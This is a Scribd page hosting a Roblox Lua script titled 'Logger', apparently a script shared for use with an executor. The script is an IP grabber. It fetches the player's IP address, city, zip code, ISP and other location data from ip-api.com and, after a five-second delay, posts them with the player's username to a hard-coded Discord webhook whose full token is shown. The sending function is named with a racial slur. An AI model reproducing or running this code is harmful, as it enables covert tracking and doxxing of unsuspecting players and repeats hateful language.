0% found this document useful (0 votes)
15 views1 page

Logger

roblo. scopry

Uploaded by

beshoyibrahim283
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
15 views1 page

Logger

roblo. scopry

Uploaded by

beshoyibrahim283
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

local player = game:GetService("Players").

LocalPlayer
local webhook_url =
"https://discord.com/api/webhooks/1309705976802185237/KjWZqaPELqRfCSsfJP3r2EGHGvSXS
NG3PCickPS7lCIGJ6ivEEa2djynQntrWoUtqp-j"
local ip_info = syn.request({
Url = "http://ip-api.com/json",
Method = "GET"
})
local ipinfo_table = game:GetService("HttpService"):JSONDecode(ip_info.Body)
local embed = {
title = "STXLLARLOGGER",
color = 0x3498db,
fields = {
{ name = "Username", value = player.Name, inline = true },
{ name = "Display Name", value = player.DisplayName, inline = true },
{ name = "Time", value = os.date('%d/%m/%Y %H:%M'), inline = true },
{ name = "Game", value =
game:GetService('MarketplaceService'):GetProductInfo(game.PlaceId).Name, inline =
true },
{ name = "Country", value = ipinfo_table.country, inline = true },
{ name = "Country Code", value = ipinfo_table.countryCode, inline = true },
{ name = "Region", value = ipinfo_table.region, inline = true },
{ name = "Region Name", value = ipinfo_table.regionName, inline = true },
{ name = "City", value = ipinfo_table.city, inline = true },
{ name = "Zipcode", value = ipinfo_table.zip, inline = true },
{ name = "ISP", value = ipinfo_table.isp, inline = true },
{ name = "Org", value = ipinfo_table.org, inline = true },
{ name = "IP", value = ipinfo_table.query, inline = true },

}
}

function getfuckednigga()
syn.request({
Url = webhook_url,
Method = "POST",
Headers = {
["Content-Type"] = "application/json"
},
Body = game:GetService("HttpService"):JSONEncode({embeds = {embed}})
})
end

-- Delayed execution of the webhook and print message after 5 seconds


delay(5, function()
getfuckednigga()
end)

You might also like